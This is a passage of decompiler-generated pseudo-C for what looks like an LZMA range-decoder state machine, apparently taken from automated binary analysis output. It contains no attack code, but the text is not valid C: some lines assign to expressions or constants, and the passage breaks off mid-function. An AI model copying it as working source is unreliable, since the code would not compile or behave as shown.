                                                                        										case 3:
                                                                        											L21:
                                                                        											__eflags =  *(_t644 - 0x6c);
                                                                        											if( *(_t644 - 0x6c) == 0) {
                                                                        												L158:
                                                                        												 *(_t644 - 0x88) = 3;
                                                                        												goto L170;
                                                                        											}
                                                                        											L22:
                                                                        											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                                        											_t67 = _t644 - 0x70;
                                                                        											 *_t67 =  &(( *(_t644 - 0x70))[1]);
                                                                        											__eflags =  *_t67;
                                                                        											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                                                                        											L23:
                                                                        											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
                                                                        											if( *(_t644 - 0x48) != 0) {
                                                                        												goto L21;
                                                                        											}
                                                                        											goto L24;
                                                                        										case 4:
                                                                        											L133:
                                                                        											_t559 =  *_t642;
                                                                        											_t626 = _t559 & 0x0000ffff;
                                                                        											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
                                                                        											if( *(_t644 - 0xc) >= _t596) {
                                                                        												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
                                                                        												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
                                                                        												 *(_t644 - 0x40) = 1;
                                                                        												_t560 = _t559 - (_t559 >> 5);
                                                                        												__eflags = _t560;
                                                                        												 *_t642 = _t560;
                                                                        											} else {
                                                                        												 *(_t644 - 0x10) = _t596;
                                                                        												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
                                                                        												 *_t642 = (0x800 - _t626 >> 5) + _t559;
                                                                        											}
                                                                        											if( *(_t644 - 0x10) >= 0x1000000) {
                                                                        												goto L139;
                                                                        											} else {
                                                                        												goto L137;
                                                                        											}
                                                                        										case 5:
                                                                        											L137:
                                                                        											if( *(_t644 - 0x6c) == 0) {
                                                                        												L168:
                                                                        												 *(_t644 - 0x88) = 5;
                                                                        												goto L170;
                                                                        											}
                                                                        											L138:
                                                                        											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
                                                                        											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                                        											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                                                                        											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                                                                        											L139:
                                                                        											_t537 =  *(_t644 - 0x84);
                                                                        											L140:
                                                                        											 *(_t644 - 0x88) = _t537;
                                                                        											goto L1;
                                                                        										case 6:
                                                                        											L25:
                                                                        											__edx = 0;
                                                                        											__eflags =  *(__ebp - 0x40);
                                                                        											if( *(__ebp - 0x40) != 0) {
                                                                        												L36:
                                                                        												__eax =  *(__ebp - 4);
                                                                        												__ecx =  *(__ebp - 0x38);
                                                                        												 *(__ebp - 0x34) = 1;
                                                                        												 *(__ebp - 0x84) = 7;
                                                                        												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                                        												goto L132;
                                                                        											}
                                                                        											L26:
                                                                        											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                                        											__esi =  *(__ebp - 0x60);
                                                                        											__cl = 8;
                                                                        											__cl = 8 -  *(__ebp - 0x3c);
                                                                        											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                                        											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                                        											__ecx =  *(__ebp - 0x3c);
                                                                        											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                                        											__ecx =  *(__ebp - 4);
                                                                        											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                                        											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                                        											__eflags =  *(__ebp - 0x38) - 4;
                                                                        											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                        											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                        											if( *(__ebp - 0x38) >= 4) {
                                                                        												__eflags =  *(__ebp - 0x38) - 0xa;
                                                                        												if( *(__ebp - 0x38) >= 0xa) {
                                                                        													_t98 = __ebp - 0x38;
                                                                        													 *_t98 =  *(__ebp - 0x38) - 6;
                                                                        													__eflags =  *_t98;
                                                                        												} else {
                                                                        													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                                        												}
                                                                        											} else {
                                                                        												 *(__ebp - 0x38) = 0;
                                                                        											}
                                                                        											__eflags =  *(__ebp - 0x34) - __edx;
                                                                        											if( *(__ebp - 0x34) == __edx) {
                                                                        												L35:
                                                                        												__ebx = 0;
                                                                        												__ebx = 1;
                                                                        												goto L61;
                                                                        											} else {
                                                                        												L32:
                                                                        												__eax =  *(__ebp - 0x14);
                                                                        												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                        												__eflags = __eax -  *(__ebp - 0x74);
                                                                        												if(__eax >=  *(__ebp - 0x74)) {
                                                                        													__eax = __eax +  *(__ebp - 0x74);
                                                                        													__eflags = __eax;
                                                                        												}
                                                                        												__ecx =  *(__ebp - 8);
                                                                        												__ebx = 0;
                                                                        												__ebx = 1;
                                                                        												__al =  *((intOrPtr*)(__eax + __ecx));
                                                                        												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                                        												goto L41;
                                                                        											}
                                                                        										case 7:
                                                                        											L66:
                                                                        											__eflags =  *(__ebp - 0x40) - 1;
                                                                        											if( *(__ebp - 0x40) != 1) {
                                                                        												L68:
                                                                        												__eax =  *(__ebp - 0x24);
                                                                        												 *(__ebp - 0x80) = 0x16;
                                                                        												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                        												__eax =  *(__ebp - 0x28);
                                                                        												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                        												__eax =  *(__ebp - 0x2c);
                                                                        												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                        												__eax = 0;
                                                                        												__eflags =  *(__ebp - 0x38) - 7;
                                                                        												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                        												__al = __al & 0x000000fd;
                                                                        												__eax = (__eflags >= 0) - 1 + 0xa;
                                                                        												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                                        												__eax =  *(__ebp - 4);
                                                                        												__eax =  *(__ebp - 4) + 0x664;
                                                                        												__eflags = __eax;
                                                                        												 *(__ebp - 0x58) = __eax;
                                                                        												goto L69;
                                                                        											}
                                                                        											L67:
                                                                        											__eax =  *(__ebp - 4);
                                                                        											__ecx =  *(__ebp - 0x38);
                                                                        											 *(__ebp - 0x84) = 8;
                                                                        											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                                        											goto L132;
                                                                        										case 8:
                                                                        											L70:
                                                                        											__eflags =  *(__ebp - 0x40);
                                                                        											if( *(__ebp - 0x40) != 0) {
                                                                        												__eax =  *(__ebp - 4);
                                                                        												__ecx =  *(__ebp - 0x38);
                                                                        												 *(__ebp - 0x84) = 0xa;
                                                                        												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                                        											} else {
                                                                        												__eax =  *(__ebp - 0x38);
                                                                        												__ecx =  *(__ebp - 4);
                                                                        												__eax =  *(__ebp - 0x38) + 0xf;
                                                                        												 *(__ebp - 0x84) = 9;
                                                                        												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                                        												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                                        											}
                                                                        											goto L132;
                                                                        										case 9:
                                                                        											L73:
                                                                        											__eflags =  *(__ebp - 0x40);
                                                                        											if( *(__ebp - 0x40) != 0) {
                                                                        												goto L90;
                                                                        											}
                                                                        											L74:
                                                                        											__eflags =  *(__ebp - 0x60);
                                                                        											if( *(__ebp - 0x60) == 0) {
                                                                        												goto L171;
                                                                        											}
                                                                        											L75:
                                                                        											__eax = 0;
                                                                        											__eflags =  *(__ebp - 0x38) - 7;
                                                                        											_t259 =  *(__ebp - 0x38) - 7 >= 0;
                                                                        											__eflags = _t259;
                                                                        											0 | _t259 = _t259 + _t259 + 9;
                                                                        											 *(__ebp - 0x38) = _t259 + _t259 + 9;
                                                                        											goto L76;
                                                                        										case 0xa:
                                                                        											L82:
                                                                        											__eflags =  *(__ebp - 0x40);
                                                                        											if( *(__ebp - 0x40) != 0) {
                                                                        												L84:
                                                                        												__eax =  *(__ebp - 4);
                                                                        												__ecx =  *(__ebp - 0x38);
                                                                        												 *(__ebp - 0x84) = 0xb;
                                                                        												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                                        												goto L132;
                                                                        											}
                                                                        											L83:
                                                                        											__eax =  *(__ebp - 0x28);
                                                                        											goto L89;
                                                                        										case 0xb:
                                                                        											L85:
                                                                        											__eflags =  *(__ebp - 0x40);
                                                                        											if( *(__ebp - 0x40) != 0) {
                                                                        												__ecx =  *(__ebp - 0x24);
                                                                        												__eax =  *(__ebp - 0x20);
                                                                        												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                        											} else {
                                                                        												__eax =  *(__ebp - 0x24);
                                                                        											}
                                                                        											__ecx =  *(__ebp - 0x28);
                                                                        											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                        											L89:
                                                                        											__ecx =  *(__ebp - 0x2c);
                                                                        											 *(__ebp - 0x2c) = __eax;
                                                                        											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                        											L90:
                                                                        											__eax =  *(__ebp - 4);
                                                                        											 *(__ebp - 0x80) = 0x15;
                                                                        											__eax =  *(__ebp - 4) + 0xa68;
                                                                        											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                                        											goto L69;
                                                                        										case 0xc:
                                                                        											L99:
                                                                        											__eflags =  *(__ebp - 0x6c);
                                                                        											if( *(__ebp - 0x6c) == 0) {
                                                                        												L164:
                                                                        												 *(__ebp - 0x88) = 0xc;
                                                                        												goto L170;
                                                                        											}
                                                                        											L100:
                                                                        											__ecx =  *(__ebp - 0x70);
                                                                        											__eax =  *(__ebp - 0xc);
                                                                        											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                        											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                        											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                        											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                        											_t334 = __ebp - 0x70;
                                                                        											 *_t334 =  *(__ebp - 0x70) + 1;
                                                                        											__eflags =  *_t334;
                                                                        											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                        											__eax =  *(__ebp - 0x2c);
                                                                        											goto L101;
                                                                        										case 0xd:
                                                                        											L37:
                                                                        											__eflags =  *(__ebp - 0x6c);
                                                                        											if( *(__ebp - 0x6c) == 0) {
                                                                        												L159:
                                                                        												 *(__ebp - 0x88) = 0xd;
                                                                        												goto L170;
                                                                        											}
                                                                        											L38:
                                                                        											__ecx =  *(__ebp - 0x70);
                                                                        											__eax =  *(__ebp - 0xc);
                                                                        											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                        											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                        											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                        											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                        											_t122 = __ebp - 0x70;
                                                                        											 *_t122 =  *(__ebp - 0x70) + 1;
                                                                        											__eflags =  *_t122;
                                                                        											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                        											L39:
                                                                        											__eax =  *(__ebp - 0x40);
                                                                        											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                        											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                                        												goto L48;
                                                                        											}
                                                                        											L40:
                                                                        											__eflags = __ebx - 0x100;
                                                                        											if(__ebx >= 0x100) {
                                                                        												goto L54;
                                                                        											}
                                                                        											L41:
                                                                        											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                                        											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                                        											__ecx =  *(__ebp - 0x58);
                                                                        											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                                        											 *(__ebp - 0x48) = __eax;
                                                                        											__eax = __eax + 1;
                                                                        											__eax = __eax << 8;
                                                                        											__eax = __eax + __ebx;
                                                                        											__esi =  *(__ebp - 0x58) + __eax * 2;
                                                                        											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                        											__ax =  *__esi;
                                                                        											 *(__ebp - 0x54) = __esi;
                                                                        											__edx = __ax & 0x0000ffff;
                                                                        											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                                        											__eflags =  *(__ebp - 0xc) - __ecx;
                                                                        											if( *(__ebp - 0xc) >= __ecx) {
                                                                        												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                        												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                        												__cx = __ax;
                                                                        												 *(__ebp - 0x40) = 1;
                                                                        												__cx = __ax >> 5;
                                                                        												__eflags = __eax;
                                                                        												__ebx = __ebx + __ebx + 1;
                                                                        												 *__esi = __ax;
                                                                        											} else {
                                                                        												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                                        												 *(__ebp - 0x10) = __ecx;
                                                                        												0x800 = 0x800 - __edx;
                                                                        												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                        												__ebx = __ebx + __ebx;
                                                                        												 *__esi = __cx;
                                                                        											}
                                                                        											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                        											 *(__ebp - 0x44) = __ebx;
                                                                        											if( *(__ebp - 0x10) >= 0x1000000) {
                                                                        												goto L39;
                                                                        											} else {
                                                                        												L45:
                                                                        												goto L37;
                                                                        											}
                                                                        										case 0xe:
                                                                        											L46:
                                                                        											__eflags =  *(__ebp - 0x6c);
                                                                        											if( *(__ebp - 0x6c) == 0) {
                                                                        												L160:
                                                                        												 *(__ebp - 0x88) = 0xe;
                                                                        												goto L170;
                                                                        											}
                                                                        											L47:
                                                                        											__ecx =  *(__ebp - 0x70);
                                                                        											__eax =  *(__ebp - 0xc);
                                                                        											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                        											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                        											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                        											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                        											_t156 = __ebp - 0x70;
                                                                        											 *_t156 =  *(__ebp - 0x70) + 1;
                                                                        											__eflags =  *_t156;
                                                                        											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                        											while(1) {
                                                                        												L48:
                                                                        												__eflags = __ebx - 0x100;
                                                                        												if(__ebx >= 0x100) {
                                                                        													break;
                                                                        												}
                                                                        												L49:
                                                                        												__eax =  *(__ebp - 0x58);
                                                                        												__edx = __ebx + __ebx;
                                                                        												__ecx =  *(__ebp - 0x10);
                                                                        												__esi = __edx + __eax;
                                                                        												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                        												__ax =  *__esi;
                                                                        												 *(__ebp - 0x54) = __esi;
                                                                        												__edi = __ax & 0x0000ffff;
                                                                        												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                        												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                        												if( *(__ebp - 0xc) >= __ecx) {
                                                                        													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                        													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                        													__cx = __ax;
                                                                        													_t170 = __edx + 1; // 0x1
                                                                        													__ebx = _t170;
                                                                        													__cx = __ax >> 5;
                                                                        													__eflags = __eax;
                                                                        													 *__esi = __ax;
                                                                        												} else {
                                                                        													 *(__ebp - 0x10) = __ecx;
                                                                        													0x800 = 0x800 - __edi;
                                                                        													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                        													__ebx = __ebx + __ebx;
                                                                        													 *__esi = __cx;
                                                                        												}
                                                                        												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                        												 *(__ebp - 0x44) = __ebx;
                                                                        												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                        													continue;
                                                                        												} else {
                                                                        													L53:
                                                                        													goto L46;
                                                                        												}
                                                                        											}
                                                                        											L54:
                                                                        											_t173 = __ebp - 0x34;
                                                                        											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                                        											__eflags =  *_t173;
                                                                        											goto L55;
                                                                        										case 0xf:
                                                                        											L58:
                                                                        											__eflags =  *(__ebp - 0x6c);
                                                                        											if( *(__ebp - 0x6c) == 0) {
                                                                        												L161:
                                                                        												 *(__ebp - 0x88) = 0xf;
                                                                        												goto L170;
                                                                        											}
                                                                        											L59:
                                                                        											__ecx =  *(__ebp - 0x70);
                                                                        											__eax =  *(__ebp - 0xc);
                                                                        											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                        											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                        											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                        											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                        											_t203 = __ebp - 0x70;
                                                                        											 *_t203 =  *(__ebp - 0x70) + 1;
                                                                        											__eflags =  *_t203;
                                                                        											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                        											L60:
                                                                        											__eflags = __ebx - 0x100;
                                                                        											if(__ebx >= 0x100) {
                                                                        												L55:
                                                                        												__al =  *(__ebp - 0x44);
                                                                        												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                                        												goto L56;
                                                                        											}
                                                                        											L61:
                                                                        											__eax =  *(__ebp - 0x58);
                                                                        											__edx = __ebx + __ebx;
                                                                        											__ecx =  *(__ebp - 0x10);
                                                                        											__esi = __edx + __eax;
                                                                        											__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                        											__ax =  *__esi;
                                                                        											 *(__ebp - 0x54) = __esi;
                                                                        											__edi = __ax & 0x0000ffff;
                                                                        											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                        											__eflags =  *(__ebp - 0xc) - __ecx;
                                                                        											if( *(__ebp - 0xc) >= __ecx) {
                                                                        												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                        												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                        												__cx = __ax;
                                                                        												_t217 = __edx + 1; // 0x1
                                                                        												__ebx = _t217;
                                                                        												__cx = __ax >> 5;
                                                                        												__eflags = __eax;
                                                                        												 *__esi = __ax;
                                                                        											} else {
                                                                        												 *(__ebp - 0x10) = __ecx;
                                                                        												0x800 = 0x800 - __edi;
                                                                        												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                        												__ebx = __ebx + __ebx;
                                                                        												 *__esi = __cx;
                                                                        											}
                                                                        											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                        											 *(__ebp - 0x44) = __ebx;
                                                                        											if( *(__ebp - 0x10) >= 0x1000000) {
                                                                        												goto L60;
                                                                        											} else {
                                                                        												L65:
                                                                        												goto L58;
                                                                        											}
                                                                        										case 0x10:
                                                                        											L109:
                                                                        											__eflags =  *(__ebp - 0x6c);
                                                                        											if( *(__ebp - 0x6c) == 0) {
                                                                        												L165:
                                                                        												 *(__ebp - 0x88) = 0x10;
                                                                        												goto L170;
                                                                        											}
                                                                        											L110:
                                                                        											__ecx =  *(__ebp - 0x70);
                                                                        											__eax =  *(__ebp - 0xc);
                                                                        											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                        											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                        											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                        											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                        											_t365 = __ebp - 0x70;
                                                                        											 *_t365 =  *(__ebp - 0x70) + 1;
                                                                        											__eflags =  *_t365;
                                                                        											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                        											goto L111;
                                                                        										case 0x11:
                                                                        											L69:
                                                                        											__esi =  *(__ebp - 0x58);
                                                                        											 *(__ebp - 0x84) = 0x12;
                                                                        											goto L132;
                                                                        										case 0x12:
                                                                        											L128:
                                                                        											__eflags =  *(__ebp - 0x40);
                                                                        											if( *(__ebp - 0x40) != 0) {
                                                                        												L131:
                                                                        												__eax =  *(__ebp - 0x58);
                                                                        												 *(__ebp - 0x84) = 0x13;
                                                                        												__esi =  *(__ebp - 0x58) + 2;
                                                                        												L132:
                                                                        												 *(_t644 - 0x54) = _t642;
                                                                        												goto L133;
                                                                        											}
                                                                        											L129:
                                                                        											__eax =  *(__ebp - 0x4c);
                                                                        											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                                        											__ecx =  *(__ebp - 0x58);
                                                                        											__eax =  *(__ebp - 0x4c) << 4;
                                                                        											__eflags = __eax;
                                                                        											__eax =  *(__ebp - 0x58) + __eax + 4;
                                                                        											goto L130;
                                                                        										case 0x13:
                                                                        											L141:
                                                                        											__eflags =  *(__ebp - 0x40);
                                                                        											if( *(__ebp - 0x40) != 0) {
                                                                        												L143:
                                                                        												_t469 = __ebp - 0x58;
                                                                        												 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                                        												__eflags =  *_t469;
                                                                        												 *(__ebp - 0x30) = 0x10;
                                                                        												 *(__ebp - 0x40) = 8;
                                                                        												L144:
                                                                        												 *((intOrPtr*)(__ebp - 0x7c)) = 0x14;
                                                                        												L145:
                                                                        												 *(_t644 - 0x50) = 1;
                                                                        												 *(_t644 - 0x48) =  *(_t644 - 0x40);
                                                                        												goto L149;
                                                                        											}
                                                                        											L142:
                                                                        											__eax =  *(__ebp - 0x4c);
                                                                        											__ecx =  *(__ebp - 0x58);
                                                                        											__eax =  *(__ebp - 0x4c) << 4;
                                                                        											 *(__ebp - 0x30) = 8;
                                                                        											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                                        											L130:
                                                                        											 *(__ebp - 0x58) = __eax;
                                                                        											 *(__ebp - 0x40) = 3;
                                                                        											goto L144;
                                                                        										case 0x14:
                                                                        											L156:
                                                                        											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                                        											__eax =  *(__ebp - 0x80);
                                                                        											while(1) {
                                                                        												L140:
                                                                        												 *(_t644 - 0x88) = _t537;
                                                                        												goto L1;
                                                                        											}
                                                                        										case 0x15:
                                                                        											L91:
                                                                        											__eax = 0;
                                                                        											__eflags =  *(__ebp - 0x38) - 7;
                                                                        											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                        											__al = __al & 0x000000fd;
                                                                        											__eax = (__eflags >= 0) - 1 + 0xb;
                                                                        											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                                        											goto L120;
                                                                        										case 0x16:
                                                                        											goto L0;
                                                                        										case 0x17:
                                                                        											while(1) {
                                                                        												L145:
                                                                        												 *(_t644 - 0x50) = 1;
                                                                        												 *(_t644 - 0x48) =  *(_t644 - 0x40);
                                                                        												goto L149;
                                                                        											}
                                                                        										case 0x18:
                                                                        											goto L146;
                                                                        										case 0x19:
                                                                        											L94:
                                                                        											__eflags = __ebx - 4;
                                                                        											if(__ebx < 4) {
                                                                        												L98:
                                                                        												 *(__ebp - 0x2c) = __ebx;
                                                                        												L119:
                                                                        												_t393 = __ebp - 0x2c;
                                                                        												 *_t393 =  *(__ebp - 0x2c) + 1;
                                                                        												__eflags =  *_t393;
                                                                        												L120:
                                                                        												__eax =  *(__ebp - 0x2c);
                                                                        												__eflags = __eax;
                                                                        												if(__eax == 0) {
                                                                        													L166:
                                                                        													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                                        													goto L170;
                                                                        												}
                                                                        												L121:
                                                                        												__eflags = __eax -  *(__ebp - 0x60);
                                                                        												if(__eax >  *(__ebp - 0x60)) {
                                                                        													goto L171;
                                                                        												}
                                                                        												L122:
                                                                        												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                                        												__eax =  *(__ebp - 0x30);
                                                                        												_t400 = __ebp - 0x60;
                                                                        												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                                        												__eflags =  *_t400;
                                                                        												goto L123;
                                                                        											}
                                                                        											L95:
                                                                        											__ecx = __ebx;
                                                                        											__eax = __ebx;
                                                                        											__ecx = __ebx >> 1;
                                                                        											__eax = __ebx & 0x00000001;
                                                                        											__ecx = (__ebx >> 1) - 1;
                                                                        											__al = __al | 0x00000002;
                                                                        											__eax = (__ebx & 0x00000001) << __cl;
                                                                        											__eflags = __ebx - 0xe;
                                                                        											 *(__ebp - 0x2c) = __eax;
                                                                        											if(__ebx >= 0xe) {
                                                                        												L97:
                                                                        												__ebx = 0;
                                                                        												 *(__ebp - 0x48) = __ecx;
                                                                        												L102:
                                                                        												__eflags =  *(__ebp - 0x48);
                                                                        												if( *(__ebp - 0x48) <= 0) {
                                                                        													L107:
                                                                        													__eax = __eax + __ebx;
                                                                        													 *(__ebp - 0x40) = 4;
                                                                        													 *(__ebp - 0x2c) = __eax;
                                                                        													__eax =  *(__ebp - 4);
                                                                        													__eax =  *(__ebp - 4) + 0x644;
                                                                        													__eflags = __eax;
                                                                        													L108:
                                                                        													__ebx = 0;
                                                                        													 *(__ebp - 0x58) = __eax;
                                                                        													 *(__ebp - 0x50) = 1;
                                                                        													 *(__ebp - 0x44) = 0;
                                                                        													 *(__ebp - 0x48) = 0;
                                                                        													L112:
                                                                        													__eax =  *(__ebp - 0x40);
                                                                        													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                        													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                                        														L118:
                                                                        														_t391 = __ebp - 0x2c;
                                                                        														 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                                        														__eflags =  *_t391;
                                                                        														goto L119;
                                                                        													}
                                                                        													L113:
                                                                        													__eax =  *(__ebp - 0x50);
                                                                        													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                        													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                        													__eax =  *(__ebp - 0x58);
                                                                        													__esi = __edi + __eax;
                                                                        													 *(__ebp - 0x54) = __esi;
                                                                        													__ax =  *__esi;
                                                                        													__ecx = __ax & 0x0000ffff;
                                                                        													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                                        													__eflags =  *(__ebp - 0xc) - __edx;
                                                                        													if( *(__ebp - 0xc) >= __edx) {
                                                                        														__ecx = 0;
                                                                        														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                                        														__ecx = 1;
                                                                        														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                                        														__ebx = 1;
                                                                        														__ecx =  *(__ebp - 0x48);
                                                                        														__ebx = 1 << __cl;
                                                                        														__ecx = 1 << __cl;
                                                                        														__ebx =  *(__ebp - 0x44);
                                                                        														__ebx =  *(__ebp - 0x44) | __ecx;
                                                                        														__cx = __ax;
                                                                        														__cx = __ax >> 5;
                                                                        														__eax = __eax - __ecx;
                                                                        														__edi = __edi + 1;
                                                                        														__eflags = __edi;
                                                                        														 *(__ebp - 0x44) = __ebx;
                                                                        														 *__esi = __ax;
                                                                        														 *(__ebp - 0x50) = __edi;
                                                                        													} else {
